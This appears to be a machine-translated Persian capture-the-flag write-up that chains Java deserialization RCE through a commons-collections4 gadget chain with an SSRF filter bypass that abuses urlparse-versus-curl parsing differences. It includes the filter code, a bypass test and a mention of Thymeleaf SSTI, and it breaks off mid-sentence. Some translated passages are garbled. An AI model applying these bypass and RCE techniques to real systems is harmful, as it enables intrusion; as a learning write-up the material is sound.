\u0647\u0646\u06af\u0627\u0645 \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 \u0686\u0627\u0644\u0634\u060c \u0648\u0628 \u0633\u0627\u06cc\u062a \u0645\u0648\u0627\u0631\u062f \u0632\u06cc\u0631 \u0631\u0627 \u0646\u0645\u0627\u06cc\u0634 \u0645\u06cc \u062f\u0647\u062f
\"\u0648\u0628
\u062a\u0633\u0648
\u0628\u0627 \u062e\u0648\u0627\u0646\u062f\u0646 \u06a9\u062f \u0645\u0646\u0628\u0639\u060c \u062e\u0648\u0627\u0647\u06cc\u062f \u062f\u06cc\u062f \u06a9\u0647 \u0686\u0627\u0644\u0634 \u0634\u0627\u0645\u0644 2 \u0633\u0631\u0648\u06cc\u0633 \u0627\u0633\u062a: \u0628\u0631\u06af\u0634\u062a<\/strong> \u0648 \u062c\u0644\u0648<\/strong>. \u0627\u0646\u062c\u0627\u0645 \u062f\u0647\u06cc\u062f \u0628\u0631\u06af\u0634\u062a<\/strong> \u062d\u0627\u0648\u06cc \u067e\u0631\u0686\u0645 \u0627\u0633\u062a\u060c \u0628\u0646\u0627\u0628\u0631\u0627\u06cc\u0646 \u0627\u0628\u062a\u062f\u0627 \u0622\u0646 \u0631\u0627 \u062a\u062c\u0632\u06cc\u0647 \u0648 \u062a\u062d\u0644\u06cc\u0644 \u062e\u0648\u0627\u0647\u0645 \u06a9\u0631\u062f.
\u062e\u062f\u0645\u0627\u062a \u0628\u0631\u06af\u0634\u062a<\/strong> \u0646\u0648\u0634\u062a\u0647 \u0634\u062f\u0647 \u062f\u0631 \u062c\u0627\u0648\u0627 \u067e\u0633 \u0627\u0632 \u062f\u06cc\u06a9\u0627\u0645\u067e\u0627\u06cc\u0644\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u0645 \u06a9\u062f \u0645\u0646\u0628\u0639 \u0631\u0627 \u0628\u062e\u0648\u0627\u0646\u06cc\u0645 \u0648 \u0628\u062f\u0627\u0646\u06cc\u0645 \u06a9\u0647 \u0628\u0631\u0646\u0627\u0645\u0647 \u0627\u0632 \u0646\u0633\u062e\u0647 11 \u062c\u0627\u0648\u0627\u060c \u0641\u0631\u06cc\u0645\u0648\u0631\u06a9 \u0628\u0648\u062a \u0641\u0646\u0631\u06cc \u0628\u0631\u0627\u06cc \u0627\u06cc\u062c\u0627\u062f \u06cc\u06a9 \u0648\u0628 \u0633\u0631\u0648\u0631 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u062f.
\u062a\u062d\u0644\u06cc\u0644 \u0633\u0631\u06cc\u0639:<\/strong> \u067e\u0633 \u0627\u0632 \u062e\u0648\u0627\u0646\u062f\u0646 \u06a9\u062f \u0645\u0646\u0628\u0639\u060c \u0645\u062a\u0648\u062c\u0647 \u0634\u062f\u0645 \u06a9\u0647 \u0628\u0631\u0646\u0627\u0645\u0647 \u0627\u0632 \u06cc\u06a9 \u062a\u0627\u0628\u0639 \u0628\u0631\u0627\u06cc \u062c\u062f\u0627\u0633\u0627\u0632\u06cc \u062f\u0627\u062f\u0647 \u0647\u0627\u06cc \u0627\u0631\u0633\u0627\u0644 \u0634\u062f\u0647 \u0627\u0632 \u0637\u0631\u06cc\u0642 \u062a\u0627\u0628\u0639 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc \u06a9\u0646\u062f.
readObject<\/em>.
\"\u062a\u0648\u0636\u06cc\u062d\u0627\u062a
\u0639\u0644\u0627\u0648\u0647 \u0628\u0631 \u0627\u06cc\u0646\u060c \u0627\u0632 \u0622\u0646\u062c\u0627 \u06a9\u0647 \u0628\u0631\u0646\u0627\u0645\u0647 \u0627\u0632 \u06a9\u062a\u0627\u0628\u062e\u0627\u0646\u0647 \u0642\u062f\u06cc\u0645\u06cc commons-collections4 \u0646\u0633\u062e\u0647 4.0 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc \u06a9\u0646\u062f => RCE \u0631\u0627 \u0645\u06cc \u062a\u0648\u0627\u0646 \u0628\u0627 \u0631\u0627\u0647 \u0627\u0646\u062f\u0627\u0632\u06cc \u0632\u0646\u062c\u06cc\u0631\u0647 \u0647\u0627\u06cc \u0627\u0628\u0632\u0627\u0631 \u0627\u0646\u062c\u0627\u0645 \u062f\u0627\u062f. \u0627\u06cc\u0646 \u0632\u0646\u062c\u06cc\u0631\u0647\u200c\u0647\u0627\u06cc \u06af\u062c\u062a \u062a\u0648\u0633\u0637 \u0627\u0641\u0631\u0627\u062f \u0632\u06cc\u0627\u062f\u06cc \u0628\u0647 \u0635\u0648\u0631\u062a \u0622\u0646\u0644\u0627\u06cc\u0646 \u062a\u062c\u0632\u06cc\u0647 \u0648 \u062a\u062d\u0644\u06cc\u0644 \u0634\u062f\u0647\u200c\u0627\u0646\u062f\u060c \u0641\u0642\u0637 \u0628\u0627\u06cc\u062f \u0622\u0646\u0647\u0627 \u0631\u0627 \u0628\u0631\u0627\u06cc \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0628\u06cc\u0627\u0648\u0631\u0645 (\u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u062f \u0628\u0647 \u0627\u0628\u0632\u0627\u0631 ysoserial \u0645\u0631\u0627\u062c\u0639\u0647 \u06a9\u0646\u06cc\u062f)!
\u0627\u0646\u062c\u0627\u0645 \u0628\u0647\u0631\u0647 \u0628\u0631\u062f\u0627\u0631\u06cc:<\/strong> \u0628\u0647 \u062f\u0646\u0628\u0627\u0644 \u0627\u06cc\u0646 \u062c\u0647\u062a\u060c \u0645\u0627 \u0628\u0631 \u0631\u0648\u06cc \u06a9\u0646\u062a\u0631\u0644\u0631 “\/ticket\/{info}” \u062a\u0645\u0631\u06a9\u0632 \u062e\u0648\u0627\u0647\u06cc\u0645 \u06a9\u0631\u062f. \u0627\u0628\u062a\u062f\u0627\u060c \u0628\u0631\u0646\u0627\u0645\u0647 \u062f\u0627\u062f\u0647 \u0647\u0627\u06cc \u0627\u0631\u0633\u0627\u0644 \u0634\u062f\u0647 \u0631\u0627 \u0645\u06cc \u06af\u06cc\u0631\u062f\u060c base64 \u0631\u0645\u0632\u06af\u0634\u0627\u06cc\u06cc \u0645\u06cc \u06a9\u0646\u062f \u0648 \u0637\u0648\u0644 \u0631\u0627 \u0628\u0631\u0631\u0633\u06cc \u0645\u06cc \u06a9\u0646\u062f\u060c \u0633\u067e\u0633 gzip \u0631\u0627 \u0627\u0632 \u062d\u0627\u0644\u062a \u0641\u0634\u0631\u062f\u0647 \u062e\u0627\u0631\u062c \u06a9\u0631\u062f\u0647 \u0648 \u0627\u0632 \u062d\u0627\u0644\u062a \u0633\u0631\u06cc\u0627\u0644 \u062e\u0627\u0631\u062c \u0645\u06cc \u06a9\u0646\u062f. \u0628\u0646\u0627\u0628\u0631\u0627\u06cc\u0646 \u067e\u0633 \u0627\u0632 \u0627\u06cc\u062c\u0627\u062f \u0628\u0627\u0631 \u0622\u0631\u0627\u06cc\u0647 \u0628\u0627\u06cc\u062a\u06cc\u060c \u0628\u0627\u06cc\u062f gzip \u0648 \u0633\u067e\u0633 base64 \u06a9\u062f\u06af\u0630\u0627\u0631\u06cc \u06a9\u0646\u06cc\u0645 \u062a\u0627 \u0628\u0647 \u0633\u0631\u0648\u0631 \u0627\u0631\u0633\u0627\u0644 \u0634\u0648\u062f – \u067e\u0633 \u0627\u0632 gzip\u060c \u067e\u0633 \u0627\u0632 gzip\u060c \u067e\u0633 \u0627\u0632 gzip\u060c payload \u0642\u0628\u0644 \u0627\u0632 \u06a9\u062f\u06af\u0630\u0627\u0631\u06cc base64 \u0628\u0627 2048 \u06a9\u0627\u0631\u0627\u06a9\u062a\u0631 \u0645\u062d\u062f\u0648\u062f \u0645\u06cc \u0634\u0648\u062f. \u0628\u0627 \u0627\u06cc\u0646 \u062d\u0627\u0644\u060c \u0632\u0645\u0627\u0646\u06cc \u06a9\u0647 \u0622\u0646 \u0631\u0627 \u0622\u0632\u0645\u0627\u06cc\u0634 \u06a9\u0631\u062f\u0645\u060c \u067e\u0633 \u0627\u0632 gzip\u060c \u062d\u062c\u0645 \u0628\u0627\u0631 \u0628\u0633\u06cc\u0627\u0631 \u06a9\u0648\u0686\u06a9\u062a\u0631 \u0628\u0648\u062f\u060c \u0648 \u0627\u0632 2048 \u06a9\u0627\u0631\u0627\u06a9\u062a\u0631 \u062a\u062c\u0627\u0648\u0632 \u0646\u0645\u06cc \u06a9\u0631\u062f\u060c \u0628\u0646\u0627\u0628\u0631\u0627\u06cc\u0646 \u0646\u06cc\u0627\u0632\u06cc \u0628\u0647 \u0646\u06af\u0631\u0627\u0646\u06cc \u062f\u0631 \u0645\u0648\u0631\u062f \u062f\u0648\u0631 \u0632\u062f\u0646 \u0686\u06cc\u0632\u06cc \u0646\u0628\u0648\u062f (\u062f\u0631 \u0627\u06cc\u0646 \u0642\u0633\u0645\u062a \u0627\u062d\u0633\u0627\u0633 \u0622\u0634\u0646\u0627\u06cc\u06cc \u062f\u0627\u0634\u062a\u0645\u060c \u0628\u0647 \u0646\u0638\u0631 \u0645\u06cc \u0631\u0633\u06cc\u062f \u06a9\u0647 \u0627\u06cc\u0646 \u0645\u0648\u0636\u0648\u0639 \u0634\u0628\u06cc\u0647 \u0622\u0647\u0646\u06af \u062e\u0637\u0631 \u0627\u0633\u062a) \u0633\u0627\u0644 2022 \u062f\u0631\u0633\u062a\u0647\u061f!).
\u06cc\u0647 \u0686\u06cc\u0632 \u062f\u06cc\u06af\u0647 \u0627\u06cc\u0646\u06a9\u0647 \u0645\u0646 \u0645\u06cc\u062e\u0648\u0627\u0645 \u067e\u06cc\u0644\u0648\u062f \u0631\u0648 \u0641\u0642\u0637 \u06cc\u06a9\u0628\u0627\u0631 \u0627\u062c\u0631\u0627 \u06a9\u0646\u0645 \u062a\u0627 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0646\u0634\u0647 \u0648 \u062f\u0631 \u0639\u06cc\u0646 \u062d\u0627\u0644 \u0628\u062f\u0648\u0646 \u0647\u06cc\u0686 \u0627\u0642\u062f\u0627\u0645 \u062f\u06cc\u06af\u0647 \u0627\u06cc \u067e\u0631\u0686\u0645 \u0628\u0647 \u0633\u0631\u0648\u0631 \u0627\u0631\u0633\u0627\u0644 \u0628\u0634\u0647\u060c \u0686\u06cc\u06a9\u0627\u0631 \u06a9\u0646\u0645\u061f \u0645\u0627 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u0645 \u06cc\u06a9 \u062f\u0631\u0628 \u067e\u0634\u062a\u06cc \u0646\u0635\u0628 \u06a9\u0646\u06cc\u0645\u060c \u0627\u0645\u0627 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u0645 \u0622\u0646 \u0631\u0627 \u0633\u0627\u062f\u0647\u200c\u062a\u0631 \u0628\u0627 \u062a\u0646\u0638\u06cc\u0645 \u06cc\u06a9 \u062a\u0627\u06cc\u0645\u0631 \u0628\u0631\u0627\u06cc \u0648\u0628\u200c\u0633\u0631\u0648\u0631 \u062c\u0627\u0648\u0627 \u0627\u0646\u062c\u0627\u0645 \u062f\u0647\u06cc\u0645 \u062a\u0627 \u067e\u0631\u0686\u0645 \u0631\u0627 \u0628\u062e\u0648\u0627\u0646\u062f \u0648 \u0628\u0647 \u0637\u0648\u0631 \u0645\u0633\u0627\u0648\u06cc \u062f\u0631 \u0641\u0648\u0627\u0635\u0644 \u0632\u0645\u0627\u0646\u06cc \u0645\u0639\u06cc\u0646 \u0627\u0631\u0633\u0627\u0644 \u06a9\u0646\u062f. \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0632\u0646\u062c\u06cc\u0631\u0647 \u06af\u062c\u062a commons-collections4\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u0645 \u0628\u0647 \u0631\u0627\u062d\u062a\u06cc \u06a9\u0644\u0627\u0633 \u062c\u0627\u0648\u0627\u06cc \u062e\u0648\u062f \u062a\u0639\u0631\u06cc\u0641 \u0634\u062f\u0647 \u0631\u0627 \u0628\u0627\u0631\u06af\u06cc\u0631\u06cc \u06a9\u0646\u06cc\u0645 \u0648 \u06a9\u062f \u062c\u0627\u0648\u0627 \u062f\u0644\u062e\u0648\u0627\u0647 \u0631\u0627 \u0627\u062c\u0631\u0627 \u06a9\u0646\u06cc\u0645. \u0627\u06cc\u0646 \u0628\u0647 \u0644\u0637\u0641 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06a9\u0644\u0627\u0633 \u0627\u0633\u062a InvokerTransformer<\/strong> \u06a9\u062a\u0627\u0628\u062e\u0627\u0646\u0647 Commons-Collections4.
\u0628\u0646\u0627\u0628\u0631\u0627\u06cc\u0646 \u0645\u062d\u0645\u0648\u0644\u0647 \u0631\u0627 \u0645\u06cc \u062a\u0648\u0627\u0646 \u0628\u0647 \u0635\u0648\u0631\u062a \u0632\u06cc\u0631 \u06a9\u062f\u06af\u0630\u0627\u0631\u06cc \u06a9\u0631\u062f
\"\u062a\u0648\u0636\u06cc\u062d\u0627\u062a
\"\u062a\u0648\u0636\u06cc\u062d\u0627\u062a
\u0628\u0627 \u0627\u06cc\u0646 \u062d\u0627\u0644\u060c RCE \u062a\u0645\u0627\u0645 \u0646\u0634\u062f\u0647 \u0627\u0633\u062a – \u0633\u0631\u0648\u06cc\u0633 \u0628\u0631\u06af\u0634\u062a\u06cc \u062f\u0631 \u06cc\u06a9 \u0641\u0627\u06cc\u0644 docker \u0628\u062f\u0648\u0646 \u067e\u0648\u0631\u062a \u0639\u0645\u0648\u0645\u06cc \u0648 \u0628\u062f\u0648\u0646 \u0627\u062a\u0635\u0627\u0644 \u0628\u0647 \u0627\u06cc\u0646\u062a\u0631\u0646\u062a \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc \u0634\u062f\u0647 \u0627\u0633\u062a! \u0628\u0646\u0627\u0628\u0631\u0627\u06cc\u0646 \u0686\u06af\u0648\u0646\u0647 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u0645 \u0628\u0647 \u0645\u062d\u0645\u0648\u0644\u0647\u200c\u0647\u0627 \u062f\u0633\u062a\u0631\u0633\u06cc \u062f\u0627\u0634\u062a\u0647 \u0628\u0627\u0634\u06cc\u0645 \u0648 \u0622\u0646\u200c\u0647\u0627 \u0631\u0627 \u0627\u0631\u0633\u0627\u0644 \u06a9\u0646\u06cc\u0645\u061f \u0645\u0627 \u0628\u0627\u06cc\u062f \u0628\u0647 \u0628\u0647\u0631\u0647 \u0628\u0631\u062f\u0627\u0631\u06cc \u0627\u0632 \u0627\u06cc\u0646 \u0633\u0631\u0648\u06cc\u0633 \u0627\u062f\u0627\u0645\u0647 \u062f\u0647\u06cc\u0645 \u062c\u0644\u0648<\/strong>.
\u067e\u0633 \u0627\u0632 \u062e\u0648\u0627\u0646\u062f\u0646 \u06a9\u062f \u0645\u0646\u0628\u0639\u060c \u0645\u062a\u0648\u062c\u0647 \u0634\u062f\u0645 \u06a9\u0647 serice \u062a\u0627\u0628\u0639 curl \u0641\u0631\u0645\u0627\u0646 \u067e\u0648\u0633\u062a\u0647 \u0631\u0627 \u0628\u0627 \u067e\u0627\u0631\u0627\u0645\u062a\u0631\u06cc \u06a9\u0647 URL \u0627\u0631\u0633\u0627\u0644 \u0634\u062f\u0647 \u0627\u0633\u062a \u0641\u0631\u0627\u062e\u0648\u0627\u0646\u06cc \u0645\u06cc \u06a9\u0646\u062f => 90% SSRF \u0628\u0631\u0627\u06cc \u0627\u06cc\u062c\u0627\u062f \u062e\u0637\u0627\u0647\u0627\u06cc \u0633\u0631\u0648\u0631 \u0627\u0633\u062a. \u0628\u0631\u06af\u0634\u062a<\/strong>. \u0628\u0627 \u0627\u06cc\u0646 \u062d\u0627\u0644\u060c \u06a9\u062f \u0645\u0646\u0628\u0639 \u0646\u06cc\u0632 \u0628\u0631\u0627\u06cc \u062c\u0644\u0648\u06af\u06cc\u0631\u06cc \u0627\u0632 \u0633\u0648\u0621 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0622\u0646 \u062e\u0637\u0627 \u0641\u06cc\u0644\u062a\u0631 \u0645\u06cc \u0634\u0648\u062f!<\/p>\n

\n
FILTERED_HOSTS<\/span> =<\/span> [<\/span>\"<\/span>back<\/span>\"<\/span>]<\/span>\nFILTERED_PATHS<\/span> =<\/span> [<\/span>\"<\/span>debug<\/span>\"<\/span>,<\/span> \"<\/span>info<\/span>\"<\/span>,<\/span> \"<\/span>ticket<\/span>\"<\/span>]<\/span>\ndef<\/span> is_approved<\/span>(<\/span>url<\/span>):<\/span>\n    \"\"\"<\/span>Indicates whether the given URL is allowed to be fetched.  This\n    prevents the server from becoming an open proxy<\/span>\"\"\"<\/span>\n    parts<\/span> =<\/span> urlparse<\/span>(<\/span>url<\/span>)<\/span>\n    host<\/span> =<\/span> parts<\/span>.<\/span>hostname<\/span>\n    path<\/span> =<\/span> parts<\/span>.<\/span>path<\/span>\n\n    if<\/span> not<\/span> parts<\/span>.<\/span>scheme<\/span> in<\/span> [<\/span>\"<\/span>http<\/span>\"<\/span>,<\/span> \"<\/span>https<\/span>\"<\/span>]:<\/span>\n        return<\/span> False<\/span>\n\n    if<\/span> host<\/span> in<\/span> FILTERED_HOSTS<\/span>:<\/span>\n        return<\/span> False<\/span>\n    for<\/span> filter_path<\/span> in<\/span> FILTERED_PATHS<\/span>:<\/span>\n        if<\/span> filter_path<\/span> in<\/span> path<\/span>:<\/span>\n            return<\/span> False<\/span>\n    return<\/span> True<\/span>\n<\/code><\/pre>\n
\n
\n    \u0648\u0627\u0631\u062f \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0634\u0648\u06cc\u062f<\/title>\n    \n<\/svg><\/p>\n
    \u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/title>\n    \n<\/svg><\/p>\n<\/div>\n<\/div>\n<\/div>\n
\u0628\u0631\u0627\u06cc \u062f\u0648\u0631 \u0632\u062f\u0646 \u0627\u06cc\u0646 \u062a\u0627\u0628\u0639 \u0628\u0631\u0631\u0633\u06cc\u060c \u0628\u0627\u06cc\u062f \u062a\u0641\u0627\u0648\u062a \u0628\u06cc\u0646 \u062a\u062c\u0632\u06cc\u0647 url \u062a\u0627\u0628\u0639 urlparse \u062f\u0631 \u067e\u0627\u06cc\u062a\u0648\u0646 \u0648 \u06a9\u062a\u0627\u0628\u062e\u0627\u0646\u0647 curl \u062f\u0631 \u0644\u06cc\u0646\u0648\u06a9\u0633 \u0631\u0627 \u067e\u06cc\u062f\u0627 \u06a9\u0646\u06cc\u0645.
+\u060c Bypass host: \u062a\u0627\u0628\u0639 urlparse \u0628\u0627 \u0627\u0633\u062a\u0627\u0646\u062f\u0627\u0631\u062f \u0642\u0627\u0644\u0628 \u0632\u06cc\u0631 \u0645\u0637\u0627\u0628\u0642\u062a \u062f\u0627\u0631\u062f
\"\u062a\u0648\u0636\u06cc\u062d\u0627\u062a
\u0628\u0627 \u0627\u06cc\u0646 \u062d\u0627\u0644\u060c \u06a9\u062a\u0627\u0628\u062e\u0627\u0646\u0647 curl \u0627\u062c\u0627\u0632\u0647 \u0645\u06cc \u062f\u0647\u062f 1\u060c 2 \u06cc\u0627 3 \u0627\u0633\u0644\u0634 \u0628\u0639\u062f \u0627\u0632 \u06a9\u0648\u0644\u0648\u0646.
\"\u062a\u0648\u0636\u06cc\u062d\u0627\u062a
(\u0645\u0646\u0628\u0639 https:\/\/curl.se\/docs\/url-syntax.html)<\/em>
\u0628\u0646\u0627\u0628\u0631\u0627\u06cc\u0646\u060c \u0627\u06af\u0631 url \u062f\u0627\u0631\u0627\u06cc \u0641\u0631\u0645 \u0647\u0627\u06cc http:\/back \u0648 http:\/\/\/back \u0628\u0627\u0634\u062f\u060c \u062a\u0627\u0628\u0639 urlparse \u067e\u0633 \u0627\u0632 \u062a\u062c\u0632\u06cc\u0647 url\u060c \u0645\u06cc\u0632\u0628\u0627\u0646 \u0631\u0627 \u0628\u0647 \u0639\u0646\u0648\u0627\u0646 None \u062f\u0631 \u0646\u0638\u0631 \u0645\u06cc \u06af\u06cc\u0631\u062f\u060c \u062f\u0631 \u062d\u0627\u0644\u06cc \u06a9\u0647 \u06a9\u062a\u0627\u0628\u062e\u0627\u0646\u0647 curl \u0647\u0645\u0686\u0646\u0627\u0646 \u0645\u06cc\u0632\u0628\u0627\u0646 \u0631\u0627 \u0628\u0647 \u0639\u0646\u0648\u0627\u0646 \u062a\u062c\u0632\u06cc\u0647 \u0645\u06cc \u06a9\u0646\u062f. \u0628\u0631\u06af\u0634\u062a<\/strong>!<\/p>\n
\n
#! \/home\/app\/venv\/bin\/python3 test.py\n<\/span>parts<\/span> =<\/span> urlparse<\/span>(<\/span>\"<\/span>http:\/back<\/span>\"<\/span>)<\/span>\nhost<\/span> =<\/span> parts<\/span>.<\/span>hostname<\/span>\nprint<\/span>(<\/span>host<\/span>)<\/span>\n<\/code><\/pre>\n
\n
\n    \u0648\u0627\u0631\u062f \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0634\u0648\u06cc\u062f<\/title>\n    \n<\/svg><\/p>\n
    \u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/title>\n    \n<\/svg><\/p>\n<\/div>\n<\/div>\n<\/div>\n
\n
$ <\/span>python3 test.py\nNone\n$ <\/span>curl http:\/back\n<!<\/span>DOCTYPE HTML>\n\n<head<\/span>><\/span>\n    Hello ASCIS<\/title>\n    <meta http-equiv=\"\" class=\"o\"\/>=<span class=\"s2\">\"Content-Type\"<\/span> <span class=\"nv\">content<\/span><span class=\"o\">=<\/span><span class=\"s2\">\"text\/html; charset=UTF-8\"<\/span> \/>\n\n\n\n    \n\n<span class=\"err\">$<\/span>\n<\/code><\/pre>\n<div class=\"highlight__panel js-actions-panel\">\n<div class=\"highlight__panel-action js-fullscreen-code-action\">\n    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-on\"><title>\u0648\u0627\u0631\u062f \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0634\u0648\u06cc\u062f<\/title>\n    <path d=\"M16 3h6v6h-2V5h-4V3zM2 3h6v2H4v4H2V3zm18 16v-4h2v6h-6v-2h4zM4 19h4v2H2v-6h2v4z\"\/>\n<\/svg><\/p>\n<p>    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-off\"><title>\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/title>\n    <path d=\"M18 7h4v2h-6V3h2v4zM8 9H2V7h4V3h2v6zm10 8v4h-2v-6h6v2h-4zM8 15v6H6v-4H2v-2h6z\"\/>\n<\/svg><\/p>\n<\/div>\n<\/div>\n<\/div>\n<p>+\u060c \u0645\u0633\u06cc\u0631 Bypass: \u0627\u0632 \u0622\u0646\u062c\u0627\u06cc\u06cc \u06a9\u0647 curl \u062f\u0648\u0628\u0627\u0631\u0647 \u0622\u062f\u0631\u0633 \u0648\u0631\u0648\u062f\u06cc \u0631\u0627 \u0631\u0645\u0632\u06af\u0634\u0627\u06cc\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f\u060c \u0641\u0642\u0637 \u0628\u0627\u06cc\u062f \u062d\u062f\u0627\u0642\u0644 \u06cc\u06a9 \u06a9\u0627\u0631\u0627\u06a9\u062a\u0631 \u0627\u0632 \u0645\u0633\u06cc\u0631 \u0631\u0627 \u062f\u0648 \u0628\u0631\u0627\u0628\u0631 \u06a9\u0646\u06cc\u0645 \u0648 \u06a9\u0627\u0631 \u0634\u0645\u0627 \u062a\u0645\u0627\u0645 \u0634\u062f!<br \/>\u0645\u0634\u06a9\u0644 \u062f\u06cc\u06af\u0631 \u0633\u0631\u0648\u06cc\u0633 \u0627\u0633\u062a <strong>\u0628\u0631\u06af\u0634\u062a<\/strong> \u0627\u06cc\u0646\u062a\u0631\u0646\u062a \u0648\u062c\u0648\u062f \u0646\u062f\u0627\u0631\u062f\u060c \u0628\u0646\u0627\u0628\u0631\u0627\u06cc\u0646 \u0645\u06cc \u062a\u0648\u0627\u0646\u06cc\u0645 \u0627\u0632 \u062e\u0637\u0627\u06cc SSRF \u0628\u0627\u0644\u0627 \u0628\u0631\u0627\u06cc \u062f\u0631\u06cc\u0627\u0641\u062a \u0627\u0632 \u0633\u0631\u0648\u0631 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u0645 <strong>\u0628\u0631\u06af\u0634\u062a<\/strong> \u0641\u0631\u0627\u062e\u0648\u0627\u0646\u06cc api \u0628\u0647 \u0633\u0631\u0648\u0631 <strong>\u062c\u0644\u0648<\/strong>\u060c \u0627\u0631\u0633\u0627\u0644 URL \u0622\u062f\u0631\u0633 \u0633\u0631\u0648\u0631 \u0645\u0627 \u0628\u0627 \u06cc\u06a9 \u067e\u0631\u0686\u0645 \u0627\u0633\u062a.<br \/>\u0627\u0646\u062c\u0627\u0645 \u0645\u0627\u06cc\u0646\u06cc\u0646\u06af<br \/><img decoding=\"async\" src=\"https:\/\/media2.dev.to\/dynamic\/image\/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto\/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkct29jxx8e3shlxte1f7.png\" alt=\"\u062a\u0648\u0636\u06cc\u062d\u0627\u062a \u062a\u0635\u0648\u06cc\u0631\" loading=\"lazy\" width=\"800\" height=\"294\" title=\"\"><br \/>\u067e\u0631\u0686\u0645 \u0631\u0627 \u0628\u06af\u06cc\u0631\u06cc\u062f \u0648 \u0628\u0647 \u0622\u0646 \u0634\u0644\u06cc\u06a9 \u06a9\u0646\u06cc\u062f<br \/><img decoding=\"async\" src=\"https:\/\/media2.dev.to\/dynamic\/image\/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto\/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgph2yzxdshnvoo04nmhu.png\" alt=\"\u062a\u0648\u0636\u06cc\u062d\u0627\u062a \u062a\u0635\u0648\u06cc\u0631\" loading=\"lazy\" width=\"409\" height=\"22\" title=\"\"><br \/><img decoding=\"async\" src=\"https:\/\/media2.dev.to\/dynamic\/image\/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto\/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhlzjyiyat3qbb3wp2qpw.png\" alt=\"\u062a\u0648\u0636\u06cc\u062d\u0627\u062a \u062a\u0635\u0648\u06cc\u0631\" loading=\"lazy\" width=\"269\" height=\"181\" title=\"\"><br \/>\u067e\u0633 \u0627\u0632 \u0627\u062a\u0645\u0627\u0645 \u0645\u0633\u0627\u0628\u0642\u0647\u060c \u062f\u0631 \u0645\u0648\u0631\u062f \u062e\u062f\u0645\u0627\u062a \u0628\u06cc\u0634\u062a\u0631 \u06cc\u0627\u062f \u06af\u0631\u0641\u062a\u0645 <strong>\u0628\u0631\u06af\u0634\u062a<\/strong> RCE \u0647\u0645\u0686\u0646\u06cc\u0646 \u0645\u06cc \u062a\u0648\u0627\u0646\u062f \u062a\u0648\u0633\u0637 \u0628\u0627\u06af SSTI \u062f\u0631 \u06a9\u062a\u0627\u0628\u062e\u0627\u0646\u0647 Thymeleaf \u0645\u0648\u0631\u062f \u0633\u0648\u0621 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0642\u0631\u0627\u0631 \u06af\u06cc\u0631\u062f. \u0628\u0647 \u0637\u0648\u0631 \u0645\u0634\u062e\u0635 \u062f\u0631 \u0628\u0646\u062f \u0632\u06cc\u0631:<br \/><img decoding=\"async\" src=\"https:\/\/media2.dev.to\/dynamic\/image\/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto\/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F605epi8yaj9ezig682e8.png\" alt=\"\u062a\u0648\u0636\u06cc\u062d\u0627\u062a \u062a\u0635\u0648\u06cc\u0631\" loading=\"lazy\" width=\"437\" height=\"139\" title=\"\"><br \/>\u0627\u06cc\u0646 \u062e\u0637\u0627 \u0628\u0647 \u0627\u06cc\u0646 \u062f\u0644\u06cc\u0644 \u0627\u0633\u062a \u06a9\u0647 Thymeleaf \u0627\u06af\u0631 \u0628\u0631 \u0627\u0633\u0627\u0633 \u0627\u0633\u062a\u0627\u0646\u062f\u0627\u0631\u062f \u062a\u062c\u0632\u06cc\u0647 \u0645\u0634\u062e\u0635 \u0634\u062f\u0647 \u062a\u0648\u0633\u0637 \u06a9\u062a\u0627\u0628\u062e\u0627\u0646\u0647 \u0646\u0648\u0634\u062a\u0647 \u0634\u062f\u0647 \u0628\u0627\u0634\u062f\u060c eval \u0631\u0634\u062a\u0647 \u0646\u0627\u0645 